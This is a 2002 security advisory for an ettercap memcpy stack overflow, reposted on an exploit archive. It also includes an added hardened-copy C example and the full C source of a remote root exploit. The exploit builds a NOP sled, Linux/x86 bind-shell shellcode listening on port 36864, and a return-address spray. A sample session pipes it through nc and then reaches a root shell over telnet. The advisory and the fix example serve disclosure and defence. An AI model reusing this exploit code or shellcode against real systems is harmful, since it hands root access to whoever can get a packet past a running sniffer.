
ettercap-0.6.3.txt
Posted Feb 19, 2002
Authored by FJ Serna | Site ngsec.com

Ettercap v0.6.3.1 and below advisory and remote root exploit against Linux. Due to improper use of the memcpy() function, anyone who can get a packet in front of the sniffer can crash ettercap and execute code as the root user.

tags | exploit, remote, root
systems | linux
SHA-256 | 0707e613e12873f42925d43ba22b3e2a53a3329febbdea8c7110ba8cc31f4e41

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



Next Generation Security Technologies
http://www.ngsec.com
Security Advisory


Title: Ettercap, remote root compromise
ID: NGSEC-2002-1
Application: ettercap 0.6.3.1 and older (http://ettercap.sourceforge.net)
Date: 05/02/2002
Status: Vendor Contacted, new fixed version released.
Platform: Linux on interfaces with MTU > 2000
Author: Fermín J. Serna <fjserna@ngsec.com>
Location: http://www.ngsec.com/docs/advisories/NGSEC-2002-1.txt


Overview:
---------

As its home page says, "Ettercap is a multipurpose
sniffer/interceptor/logger for switched LAN". Due to improper use of the
memcpy() function, anyone who can get a packet in front of the sniffer can
crash ettercap and execute code as the root user.

The vulnerability has been confirmed and exploited in ettercap version
0.6.3.1. Older versions may be vulnerable too.

This vulnerability only exists in the Linux version, because on *BSD and
Mac OS X ettercap only works on Ethernet devices, whose MTU is too small
to reach the overflow (see below).

Technical description:
----------------------

Ettercap is composed of decoders that look for users, passwords,
communities and the like in the sniffed traffic.

Several decoders (mysql, irc, ...) suffer the following problem:

memcpy(collector, payload, data_to_ettercap->datalen);

Collector is declared as:

u_char collector[MAX_DATA];

Where MAX_DATA is:

#define MAX_DATA 2000

datalen is the length of the data following the TCP/UDP header, as read
from the interface, and it is never checked against MAX_DATA. So on
interfaces whose MTU is higher than 2000 the copy overruns collector and
ettercap can be exploited. Normal Ethernet has an MTU of 1500 and ettercap
does not reassemble IP fragments, so on Ethernet the overflow cannot be
reached with a single packet; ettercap can still be crashed there with a
forged packet whose IP header claims more data than is present
(ip->tot_len > MAX_DATA).

Here are common MTU and interface types:

65535 Hyperchannel
17914 16 Mbit/sec token ring
8166 Token Bus (IEEE 802.4)
4464 4 Mbit/sec token ring (IEEE 802.5)
1500 Ethernet
1500 PPP (typical; can vary widely)
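The decoder pattern above, its hardened form, and the MTU reasoning that decides where the overflow is reachable, as an added example written for this page (this is not ettercap's code and not the NGSEC exploit): the struct layout, the function names and the 4096-byte constructed payload are assumptions; MAX_DATA and the MTU values come from the advisory.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_DATA 2000   /* size of collector[] in the vulnerable decoders */

/* Stand-in for the per-packet record the decoders receive (assumed layout,
 * not ettercap's real struct): datalen is what the IP header claims follows
 * the TCP/UDP header, caplen is how many payload bytes were really captured. */
struct captured_packet {
    const uint8_t *payload;
    size_t datalen;   /* derived from ip->tot_len: attacker controlled */
    size_t caplen;    /* bytes actually present in the capture buffer */
};

/* The advisory's bug, stated as a predicate instead of performed:
 * memcpy(collector, payload, datalen) overruns collector[MAX_DATA]
 * whenever datalen exceeds MAX_DATA. */
int collector_would_overflow(const struct captured_packet *p)
{
    return p->datalen > MAX_DATA;
}

/* Hardened copy: bounds datalen against both the destination buffer and
 * the captured length, so neither an oversized payload nor a forged
 * ip->tot_len on a short packet reaches memcpy(). Returns bytes copied,
 * or -1 for a packet the original code would have mishandled. */
int collect_payload_safe(const struct captured_packet *p,
                         uint8_t *collector, size_t collector_size)
{
    if (p->datalen > p->caplen)        /* forged tot_len: source over-read */
        return -1;
    if (p->datalen > collector_size)   /* oversized payload: stack overflow */
        return -1;
    memcpy(collector, p->payload, p->datalen);
    return (int)p->datalen;
}

/* Largest TCP payload a single unfragmented packet can carry on a link:
 * MTU minus a minimal IPv4 header and a minimal TCP header (20 + 20).
 * Because the vulnerable ettercap does not reassemble IP fragments, the
 * overflow is only reachable where this exceeds MAX_DATA. */
size_t max_tcp_payload(size_t mtu)
{
    const size_t ipv4_hdr = 20, tcp_hdr = 20;
    return mtu > ipv4_hdr + tcp_hdr ? mtu - ipv4_hdr - tcp_hdr : 0;
}

int mtu_allows_overflow(size_t mtu)
{
    return max_tcp_payload(mtu) > MAX_DATA;
}

/* Drive collect_payload_safe() with a constructed packet: the payload is a
 * static 4096-byte buffer of 'A's standing in for captured wire data. */
int try_packet(size_t datalen, size_t caplen)
{
    static uint8_t wire[4096];
    uint8_t collector[MAX_DATA];
    struct captured_packet p;

    if (caplen > sizeof wire)
        return -2;
    memset(wire, 'A', sizeof wire);
    p.payload = wire;
    p.datalen = datalen;
    p.caplen = caplen;
    return collect_payload_safe(&p, collector, sizeof collector);
}

int main(void)
{
    /* The advisory's interface table, plus the loopback case it exploits. */
    const struct { const char *name; size_t mtu; } links[] = {
        { "Hyperchannel", 65535 }, { "16 Mbit/s token ring", 17914 },
        { "Token Bus (802.4)", 8166 }, { "4 Mbit/s token ring (802.5)", 4464 },
        { "Ethernet", 1500 }, { "PPP (typical)", 1500 }, { "Linux loopback", 16436 },
    };
    size_t i;

    for (i = 0; i < sizeof links / sizeof links[0]; i++)
        printf("%-28s MTU %5zu  max TCP payload %5zu  overflow reachable: %s\n",
               links[i].name, links[i].mtu, max_tcp_payload(links[i].mtu),
               mtu_allows_overflow(links[i].mtu) ? "yes" : "no");

    printf("datalen 1460 / caplen 1460 -> %d\n", try_packet(1460, 1460));
    printf("datalen 2100 / caplen 2100 -> %d\n", try_packet(2100, 2100));
    printf("datalen 3000 / caplen   60 -> %d (forged tot_len)\n", try_packet(3000, 60));
    return 0;
}
```

The two checks in collect_payload_safe() map onto the two outcomes the advisory distinguishes: the caplen check stops the Ethernet crash case (a forged ip->tot_len with no data behind it), the collector_size check stops the large-MTU exploit case. Rejecting rather than truncating is deliberate: a silently truncated credential is a correctness bug in a sniffer, while a rejected packet is just a missed decode.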


An exploit for this vulnerability can be found at

http://www.ngsec.com/dowloads/exploits/ettercap-x.c

Sample exploitation can also be done on the loopback interface (MTU 16436):

piscis:~# ettercap -NszC -i lo &
[1] 21887
piscis:~# ./ettercap-x 0 | nc localhost 3306
ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>
Next Generation Security Technologies
http://www.ngsec.com

punt!
piscis:~# telnet localhost 36864
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),10(wheel)


Recommendations:
----------------

Upgrade to a fixed ettercap version.
Run ettercap in a secure environment.


More advisories at: http://www.ngsec.com/advisories/
PGP Key: http://www.ngsec.com/labs.asc

(c)Copyright 2002 NGSEC. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: Made with pgp4pine 1.76

iD8DBQE8awI5KrwoKcQl8Y4RAl5HAJsHgiOuhE08kArQNKrOPPhQDkW6swCfUkAH
307ifuCsbg5mxFlTvhr4jbY=
=o2T9
-----END PGP SIGNATURE-----


/*
* ettercap-0.6.3.1 remote root xploit
*
* By: Fermín J. Serna <fjserna@ngsec.com>
* Next Generation Security Technologies
* http://www.ngsec.com
*
* DESCRIPTION:
* ============
*
* Several decoders (mysql, irc, ...) suffer the following problem:
*
* memcpy(collector, payload, data_to_ettercap->datalen);
*
* collector is declared as:
*
* u_char collector[MAX_DATA];
*
* where MAX_DATA is:
*
* #define MAX_DATA 2000
*
* So on interfaces where MTU is higher than 2000 you can exploit
* ettercap. Nope, normal Ethernet has MTU 1500 ;P
*
* Here are common MTU and interface types:
*
* 65535 Hyperchannel
* 17914 16 Mbit/sec token ring
* 8166 Token Bus (IEEE 802.4)
* 4464 4 Mbit/sec token ring (IEEE 802.5)
* 1500 Ethernet
* 1500 PPP (typical; can vary widely)
*
* Sample exploitation can also be done on the loopback interface (MTU 16436):
*
* piscis:~# ettercap -NszC -i lo &
* [1] 21887
* piscis:~# ./ettercap-x 0 | nc localhost mysql
* ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>
* Next Generation Security Technologies
* http://www.ngsec.com
*
* punt!
* piscis:~# telnet localhost 36864
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* id;
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
*
* Madrid, 5/02/2002
*
*/


#include <stdio.h>
#include <stdlib.h>   /* atoi() */
#include <string.h>
#include <stdint.h>   /* uint32_t: return addresses for 32-bit x86 Linux */

#define NUM_ADDR 100            /* copies of the return address after the shellcode */
#define NOP 0x41                /* inc %ecx: single-byte filler with no NUL bytes */
#define BUFF_SIZE 2200          /* > MAX_DATA (2000): overruns collector[] on the stack */
#define RET_ADDR 0xbfffea58     /* guessed stack address inside the NOP sled */
#define OFFSET 0                /* adjusted with argv[1] if the guess is off */

/* Linux/x86 bind shell: listens on TCP port 36864 and execs /bin/sh */
char shellcode[]=
"\x1b\xeb\x78\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40"
"\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\xeb\x01\x3C\x43\xc6\x46"
"\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\xeb\x01\x2D\x86\xc3\xb0\x3f\x29\xc9"
"\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f\x41\xcd\x80\x88\x56\x07\x89"
"\x76\x0c\x87\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80\xe8\x83\xff\xff\xff"
"/bin/sh";

int main(int argc, char **argv) {
    char buffer[BUFF_SIZE+1];   /* +1: room for the terminating NUL written below */
    char *ch_ptr;
    uint32_t *lg_ptr;
    int aux;
    int offset=OFFSET;
    size_t sled;

    fprintf(stderr,"ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>\n");
    fprintf(stderr,"Next Generation Security Technologies\n");
    fprintf(stderr,"http://www.ngsec.com\n\n");

    if (argc==2) offset=atoi(argv[1]);

    memset(buffer,0,sizeof(buffer));

    /* Payload layout: [NOP sled][shellcode][RET_ADDR x NUM_ADDR] = BUFF_SIZE bytes.
     * The repeated return addresses overwrite the saved EIP of the decoder and
     * land inside the sled, which slides into the bind shell. */
    ch_ptr=buffer;
    sled=BUFF_SIZE-strlen(shellcode)-4*NUM_ADDR;
    memset(ch_ptr,NOP,sled);
    ch_ptr+=sled;
    memcpy(ch_ptr,shellcode,strlen(shellcode));
    ch_ptr+=strlen(shellcode);
    lg_ptr=(uint32_t *)ch_ptr;
    for (aux=0;aux<NUM_ADDR;aux++) *(lg_ptr++)=RET_ADDR+offset;
    ch_ptr=(char *)lg_ptr;
    *ch_ptr='\0';

    /* The payload contains no NUL bytes, so %s emits all BUFF_SIZE bytes;
     * pipe them into a port one of the affected decoders watches, e.g.
     * ./ettercap-x 0 | nc <host> 3306 */
    printf("%s",buffer);

    return(0);
}

